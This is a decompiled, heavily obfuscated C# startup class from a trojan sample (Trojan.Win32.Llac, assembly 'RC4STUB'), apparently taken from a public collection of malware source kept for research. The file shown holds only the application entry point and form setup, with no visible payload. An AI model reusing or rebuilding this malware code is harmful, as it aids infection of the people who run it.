MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.coak-8789f9be2212d2703a374fd76b1c014be160523209fd6790cd7b4f20f0f5fe91/_0002/_0002.cs

47 lines
1.4 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 160606E6-36B6-4FBA-AFEC-6A83B6EA2ADB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.coak-8789f9be2212d2703a374fd76b1c014be160523209fd6790cd7b4f20f0f5fe91.exe
using \u0003;
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace \u0002
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class \u0002 : WindowsFormsApplicationBase
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[STAThread]
internal static void \u0002([In] string[] obj0)
{
try
{
\u0008\u0002.\u000E\u0003(\u008F.\u0013());
}
finally
{
}
\u0095.\u007E\u0011((object) \u0002.\u0002(), obj0);
}
public \u0002()
: base(AuthenticationMode.Windows)
{
\u000E\u0002.\u007E\u0018((object) this, false);
\u000E\u0002.\u007E\u0017((object) this, true);
\u000E\u0002.\u007E\u0015((object) this, true);
\u0084.\u007E\u0016((object) this, ShutdownMode.AfterMainFormCloses);
}
protected override void OnCreateMainForm() => \u0019.\u007E\u0012((object) this, (Form) \u0002.\u0002().\u0002());
}
}